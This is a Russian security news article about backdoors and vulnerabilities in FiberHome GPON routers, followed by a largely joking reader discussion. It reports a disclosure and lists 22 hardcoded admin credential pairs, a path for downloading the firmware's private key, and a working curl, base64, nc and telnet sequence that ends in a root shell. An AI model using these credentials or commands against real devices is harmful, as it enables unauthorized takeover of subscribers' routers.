The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Бэкдор в маршрутизаторах FiberHome

18.01.2021 20:37

В маршрутизаторах FiberHome, применяемых провайдерами для подключения абонентов к оптическим линиям связи GPON, выявлено 17 проблем с безопасностью, среди которых наличие бэкдоров с предопределёнными учётными данными, позволяющими удалённо управлять оборудованием. Проблемы дают возможность удалённому атакующему получить root-доступ к устройству без прохождения аутентификации. Наличие уязвимостей подтверждено в устройствах FiberHome HG6245D и RP2602, а также частично в устройствах AN5506-04-*, но не исключено, что проблемы затрагивают и другие модели маршрутизаторов данной компании, которые не проверялись.

Отмечается, что по умолчанию доступ по IPv4 к интерфейсу администратора на изученных устройствах ограничен внутренним сетевым интерфейсом, допускающим обращение только из локальной сети, но при этом доступ по IPv6 никак не ограничен, что позволяет использовать присутствующие бэкдоры при обращении по IPv6 из внешней сети.

Кроме web-интерфейса, работающего через HTTP/HTTPS, на устройствах предусмотрена функция для удалённой активации интерфейса командной строки, к которому можно обращаться по протоколу telnet. CLI активируется отправкой специального запроса по протоколу HTTPS с предопределёнными учётными данными. Кроме того, в http-сервере, обслуживающем web-интерфейс, выявлена уязвимость (переполнение стека), эксплуатируемая через отправку запроса со специально оформленным значением HTTP Cookie.

Всего исследователем выявлено 17 проблем с безопасностью, из которых 7 затрагивают HTTP-сервер, 6 - сервер telnet, а остальные связаны с общесистемными брешами. Производитель был уведомлен о выявленных проблемах год назад, но информации об исправлении не поступило. Среди выявленных проблем:

  • Утечка информации о подсетях, прошивке, идентификаторе соединения FTTH , IP- и MAC-адресах на стадии до прохождения аутентификации.
  • Сохранение в логе паролей пользователей в открытом виде.
  • Хранение открытым текстом учётных данных для подключения к беспроводным сетям и паролей.
  • Переполнение стека в HTTP-сервере.
  • Присутствие в прошивке закрытого ключа для SSL-сертификатов, который можно загрузить по HTTPS ("curl https://host/privkeySrv.pem").
  • Бэкдор для активации telnet - в коде http-сервера присутствует специальный обработчик запросов "/telnet", а также обработчик "/fh" для привилегированного доступа.
  • Жёстко заданные в прошивке инженерные пароли и параметры аутентификации. Всего в коде http-сервера было выявлено 23 прошитых учётных записей, привязанных к разным провайдерам. Пароли использовались в обработчике https://ip/fh для активации telnet:
    • user / user1234
    • f~i!b@e#r$h%o^m*esuperadmin / s(f)u_h+g|u
    • admin / lnadmin
    • admin / CUadmin
    • admin / admin
    • telecomadmin / nE7jA%5m
    • adminpldt / z6dUABtl270qRxt7a2uGTiw
    • gestiontelebucaramanga / t3l3buc4r4m4ng42013
    • rootmet / m3tr0r00t
    • awnfibre / fibre@dm!n
    • trueadmin / admintrue
    • admin / G0R2U1P2ag
    • admin / 3UJUh2VemEfUtesEchEC2d2e
    • admin / c 6 по 32 символы MAC-адреса на интерфейсе br0
    • admin / 888888
    • L1vt1m4eng / 888888
    • useradmin / 888888
    • user / 888888
    • admin / 1234
    • user / tattoo@home
    • admin / tele1234
    • admin / aisadmin
  • Дополнительно в CLI-интерфейсе можно запустить на 26 сетевом порту отдельный процесс telnetd с правами root, передав последовательность команд "�,help,list,who,ddd,tshell" ('GgpoZWxwCmxpc3QKd2hvCg==' в base64). Для подключения к telnet определён общий пароль "GEPON".

В простейшем случае для получения root-доступа к маршрутизатору достаточно отправить несколько запросов при помощи утилиты curl:


   # Получаем информацию о MAC-адресе, через API, доступный без аутентификации:

    curl -k https://target/info.asp 

   # Используем хвост MAC-адреса в качестве ключа для снятия в пакетном фильтре блокировки доступа к CLI-интерфейсу по протоколу telnet:

    сurl -k 'https://target/telnet?enable=1&key=ENDING_PART_MAC_ADDR'  

   # Отправляем в CLI-интерфейс на 23 порт последовательность команд для запуска процесса telnetd.
                                      
    echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d | nc target 23 >/dev/null &
                                                                                        
   # Подключаемся к сетевому порту 26 по протоколу telnet с логином root и паролем  GEPON.                                                                             

    telnet target 26
   
    (none) login: root
    Password: [GEPON]
    BusyBox v1.27.2 (2019-04-01 19:16:06 CST) built-in shell (ash)
    #id
    uid=0(root) gid=0 groups=0 # game over



  1. Главная ссылка к новости (https://seclists.org/fulldiscl...)
  2. OpenNews: Уязвимости в маршрутизаторах GPON, которые уже используются для создания ботнета
  3. OpenNews: В межсетевых экранах Juniper выявлен бэкдор с функциями расшифровки трафика VPN
  4. OpenNews: В Webmin найден бэкдор, позволяющий удалённо получить доступ с правами root
  5. OpenNews: Результаты анализа бэкдоров в приложениях для Android
  6. OpenNews: Бэкдор в межсетевых экранах и контроллерах точек доступа Zyxel
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/54428-fiberhome
Ключевые слова: fiberhome, gpon, backdoor
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (74) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, InuYasha (??), 20:33, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    Не вижу логинов mts, mgts, rtkom )
     
     
  • 2.2, Шарп (ok), 20:35, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Наши не шпионят. Только мерзкие ЦРУ и ФБР.
     
     
  • 3.9, Аноним (-), 21:09, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +10 +/
    > Наши не шпионят.

    учитывая, что при подключении оптики в дом часто рутер/мультиплексор даётся провом в аренду, то наверняка там есть всё, что нужно для типа "служебного" доступа.

     
     
  • 4.15, InuYasha (??), 21:32, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Уже проверено и известно. Потому и спрашивал с улыбкой.
     
     
  • 5.17, InuYasha (??), 21:35, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Помнится, поверхностно было где-то здесь https://kiwibyrd.org/2018/02/24/5102/
     
     
  • 6.27, Аноним (27), 23:10, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    И Кормильцев, Тутанхамон Патенты патентастов - не их Вся сила патентов в пред... большой текст свёрнут, показать
     
     
  • 7.29, InuYasha (??), 23:34, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Я очень извиняюсь - дал не ту ссылку. "ту" потерял, поиски продолжаются. (

    PS: да, во многом согласен.

     
  • 5.38, Гэндальф (?), 04:37, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Потому и спрашивал с улыбкой

    Это где был вопрос то?

     
  • 4.23, zzz (??), 22:25, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • –7 +/
    Ты себе-то не интересен, не то, что "службистам".
     
  • 4.54, macfaq (?), 14:35, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> Наши не шпионят.
    > учитывая, что при подключении оптики в дом часто рутер/мультиплексор даётся провом в
    > аренду, то наверняка там есть всё, что нужно для типа "служебного"
    > доступа.

    GPON/GEPON-терминалы в любом случае под контролем провайдера.
    Остальное по ситуации.

     
     
  • 5.80, Аноним (80), 07:49, 25/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну так оборвать ему вафлю и выкинуть на всякий случай за пределы жилища, после чего посчитать +1 провайдерским маршрутизатором накрайняк. За ним будет еще с десяток такого, вас же это не смущает?
     
  • 2.3, Аноним (3), 20:35, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Они на Sercomm'овских роутерах зашиты)
     
  • 2.11, Аноним (11), 21:17, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Они юзают admin\admin
     
  • 2.13, commiethebeastie (ok), 21:28, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    admin/admin1 попробуй.
     
  • 2.46, tmplsr (?), 09:35, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >"Бэкдор в маршрутизаторах FiberHome"

    Классика жанра: "скажи друг и проходи".

     

  • 1.4, Аноним (4), 20:45, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Мда...
     
  • 1.5, Аноним (5), 20:45, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d

    help
    list
    who
    ddd
    tshell

    странная "последовательность команд для запуска телнет"... Это точно не русские? Очень на них похоже.

     
     
  • 2.7, Андропов17 (?), 20:57, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Это точно не русские? Очень на них похоже.

    Нет товарищ, это сделано специально проклятыми империалистами и ястребами войны, чтобы подставить честных и открытых разведчиков, а "новички" вроде вас, слишком много болтают на радость шпиёнам, тем самым подрывая веру в светлое будущее "Чебурнета" тчк

     
  • 2.8, Русские (?), 21:09, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > странная "последовательность команд для запуска телнет"... Это точно не русские? Очень на них похоже.

    Точно. Мы обычно в бэкдоры вставляем одну команду из трёх букв

     
     
  • 3.35, Crazy Alex (ok), 01:10, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Да вы её везде вставляете
     
  • 3.48, Атон (?), 10:41, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    run ?
     
     
  • 4.49, tmplsr (?), 12:07, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > run ?

    ...ты правда русский?

    https://cs.pikabu.ru/post_img/2014/01/04/7/1388829052_1838531262.jpg

     
     
  • 5.56, Атон (?), 16:22, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >> run ?
    > ...ты правда русский?
    > https://cs.pikabu.ru/post_img/2014/01/04/7/1388829052_1838531262.jpg

    нет
    тор
    так
    сон
    соя
    лак
    рой
    дар
    мир
    рок
    сук
    бес
    род
    ком
    кон
    кол
    боб

     
  • 4.51, Русские (?), 13:15, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    душ
     
     
  • 5.55, Атон (?), 16:19, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > душ

    ухо
    нос
    око
    кот
    кит
    ток
    чуб
    год
    сок
    мёд
    лён
    суп
    маг
    ком
    рис
    пот
    бак
    яма
    лак
    воз
    рой
    луг
    тол
    бар
    мак
    лёд
    вар
    ров
    код
    сад

     
  • 2.53, Аноним (53), 14:22, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    К тому же намного читабельнее было бы printf "\x1a\nhelp\nlist\nwho\nddd\ntshell\n"
     

  • 1.6, Онаним (?), 20:55, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +6 +/
    Обычная китайская поляпка-поделка. Всё нормально.
     
  • 1.10, Сейд (ok), 21:13, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Как же защититься от этой дыры?
     
     
  • 2.31, Аноним (31), 00:35, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    поставить перед ним ещё один другой маршрутизатор
     
  • 2.39, Гимли (?), 04:38, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Спроси настоящего мистера Ф.
     
  • 2.57, Аноним (57), 17:47, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Переписать на Rust!
     
     
  • 3.73, sektant (?), 15:03, 20/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Самим-то не надоела ещё эта клоунада?
     

  • 1.12, ryoken (ok), 21:18, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    OpenWRT на это добро бывает?
     
     
  • 2.24, zzz (??), 22:30, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    OPNsense
     
     
  • 3.81, Аноним (80), 07:52, 25/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    На вот эту штуку с фибеорптикой? А он такой бывает?
     
  • 2.25, Аноним (25), 23:06, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Сглазили https://www.opennet.me/opennews/art.shtml?num=54430
     
     
  • 3.36, Crazy Alex (ok), 01:10, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Форум - и пёс бы с ним
     

  • 1.14, commiethebeastie (ok), 21:29, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Даже не знаю какой из этих паролей лучше.
     
  • 1.18, Wilem82 (?), 21:45, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +19 +/
    Опеннет же любит переводить айтишные термины с английского на русские, почему тут - "бэкдор"? В сто раз лучше же звучит: "в маршрутизаторах FiberHome обнаружен задний проход".
     
     
  • 2.26, DildoZilla (?), 23:09, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Я только за, птичий язык изрядно поднадоел, но в английском backdoor имеет несколько значений, одно из которых таки да, приведёт к появлению новостей вида "В маршрутизаторах капиталистических империалистов <название_шараги> обнаружен анальный секс!".
     
     
  • 3.45, Аноним (45), 07:34, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ЗапаснЫй вход
     
  • 3.62, Аноним (62), 20:28, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Черный ход или секретная дверь/тайная дверь/тайный вход
     
  • 2.28, Аноним (27), 23:15, 18/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Название "задний проход" зарезервировано за https://en.wikipedia.org/wiki/Back_Orifice.
     
     
  • 3.34, InuYasha (??), 00:53, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Название "задний проход" зарезервировано за https://en.wikipedia.org/wiki/Back_Orifice.

    "Заднее отверстие", тогда уж. А "задняя дверь" вполне себе распространённое и бытовое, и шпионское понятие.

     
  • 2.43, lleeree_ (ok), 06:03, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >В сто раз лучше же звучит: "в маршрутизаторах FiberHome обнаружен задний проход".

    Скорее "черный вход".

     
     
  • 3.44, Аноним (31), 06:59, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > чёрный вход

    нельзя так писать... надо: афроамериканский вход

     

  • 1.19, Огонь (?), 21:56, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    Mikrotik таким не страдает
     
     
  • 2.32, Ivan_83 (ok), 00:52, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Там другой набор зашитых бэкдоров :)
     
     
  • 3.60, kissmyass (?), 20:03, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    есть пруф? или просто поржать ляпнул?
     
     
  • 4.63, Сейд (ok), 20:49, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    https://www.securitylab.ru/news/502195.php
     
     
  • 5.69, Аноним (69), 01:25, 20/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Фейк
     
  • 5.72, kissmyass (?), 07:43, 20/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > https://www.securitylab.ru/news/502195.php

    если почитать процедуру обновления, то для бекдора слишком геморно, это сколько раз маршрутизатор будет не доступен

    второй момент - загрузка обновлений, микротик не проверяет TLS соединенение со своими серверами?

    как-то странно

     
     
  • 6.79, Аноним (-), 07:41, 25/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > если почитать процедуру обновления, то для бекдора слишком геморно,

    Уж не сложнее реверса cisco ios, а поток $ с продажи ботов мотивирует и вполне мозгастых чернокнижников, способных делать зомби из чего угодно, лишь бы там процессор был.

    > это сколько раз маршрутизатор будет не доступен

    Вот это точно хакеров и ботов не интересует. Сиди и карауль мокротик с сифером наперевес. Чтобы интереснее было, подарю идею атакующей стороне: подождите до 3 утра локального времени и приступайте :). Предварительно пульнув мегаодмину письмо в почту с картинкой на file://C:\:$i30:$bitmap какой-нибудь, чтобы он озаботился другими вещами.

     
     
  • 7.82, kissmyass (?), 11:57, 25/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >> если почитать процедуру обновления, то для бекдора слишком геморно,
    > Уж не сложнее реверса cisco ios, а поток $ с продажи ботов
    > мотивирует и вполне мозгастых чернокнижников, способных делать зомби из чего угодно,
    > лишь бы там процессор был.
    >> это сколько раз маршрутизатор будет не доступен
    > Вот это точно хакеров и ботов не интересует. Сиди и карауль мокротик
    > с сифером наперевес. Чтобы интереснее было, подарю идею атакующей стороне: подождите
    > до 3 утра локального времени и приступайте :). Предварительно пульнув мегаодмину
    > письмо в почту с картинкой на file://C:\:$i30:$bitmap какой-нибудь, чтобы он озаботился
    > другими вещами.

    я к тому что это не бекдор, а уязвимость

     
  • 2.37, бабушка карловна (?), 03:36, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    управляемой пироманией и мойкой они страдают. кто в теме поймет о чем речь.
     

  • 1.30, Аноним (30), 23:34, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Ростелеком? Что скажет специалист по России Боб Джонстон?
     
     
  • 2.58, Аноним (58), 18:02, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    У тех Хуавей вроде. Так что спрашивай майора Ван Хо
     

  • 1.33, Ivan_83 (ok), 00:52, 19/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Такое ощущение что сделано всё возможное чтобы можно было залогинится под админом используя любимый пароль :)
     
  • 1.40, FractaL (?), 04:40, 19/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Потому что писать не умеете. Вот я тоже не умею, но зато хорошо ваняю.
     
     
  • 2.70, fske (?), 02:49, 20/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >но зато хорошо ваняю

    Потому что ты Ваня или просто безграмотный?

     
     
  • 3.78, Аноним (-), 07:29, 25/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Кому Ваня, а кому и майор Ван Хо!
     

  • 1.41, FractaL (ok), 05:07, 19/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    бу
     
  • 1.47, Аноним (47), 09:52, 19/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Это gpon-терминалы, какой еще openwrt? Это железка, которую не заменить на другую, не прошить, разве что такой же дырявой прошивкой. А дыры эти вполне могут быть добавлены по просьбе провайдера, который заказал партию этих железок. Саппорт в них лазит, когда у очередного клиента "ничего не работает". Решение - перевести в бридж этот хлам и забыть
     
     
  • 2.50, Аноним (50), 12:09, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Решение - перевести в бридж этот хлам и забыть

    Ну во-первых тебе китайский провайдер ничего никуда перевести не даст, с большой долей вероятности :D

     
     
  • 3.61, Аноним (61), 20:26, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Ну во-первых тебе китайский провайдер ничего никуда перевести не даст, с большой долей вероятности

    Где ты увидел в новости про "китайского провайдера"? Такое железо может оказаться где угодно - если твой провайдер решит закупить такие pon-терминалы - то даже у тебя дома. :D

     
  • 2.65, Аноним (27), 22:14, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Неправильное решение. Правильное - отреверсить GPON-протокол, отреверсить железку и дрова и сделать FOSS-замену, а копирастов прокинуть через ***.
     
  • 2.67, Гентушник (ok), 23:42, 19/01/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Поставить перед ним роутер и дело с концами. Всё равно всё оборудование по пути следования пакетов контролировать не получится.
    Самое главное защитить "последнюю милю" и считать её как раз от роутера своего, а не от железки провайдера.
     
     
  • 3.77, Аноним (-), 07:28, 25/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Поставить перед ним роутер и дело с концами.

    Не забыв его на openwrt перешить, а то там тоже 23 инженерных логина окажутся случайно.

     

  • 1.52, Аноним (52), 14:07, 19/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Забавно, но часть паролей мне знакомо.
    Вот G0R2U1P2ag где-то даже стандартный.
     
  • 1.64, ююю (?), 21:20, 19/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    А чо ето за контора? впервые слышу о такой.
    Сорри мы только Cisco юзаем
     
     
  • 2.68, Аноним (69), 01:24, 20/01/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Бэкдоры элитнее?
     
  • 2.71, Аноним (31), 03:26, 20/01/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > только Cisco юзаем

    Это та самая, которая поставила троянов в Иран? :)

     
  • 2.76, Аноним (-), 07:27, 25/01/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Зато теперь они смогут номинироваться в книгу рекордов Гиннеса. Сразу 23 забытых "инженерных логина" наверное катит на номинацию most backdoored device in universe.
     

  • 1.74, ЛУО (ok), 19:19, 20/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Это серезно? Откуда появилась такая информация?
     
  • 1.75, Аноним (-), 07:26, 25/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Всего в коде http-сервера было выявлено
    > 23 прошитых учётных записей

    Случайно забыли инженерный логин. И так 23 раза подряд.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру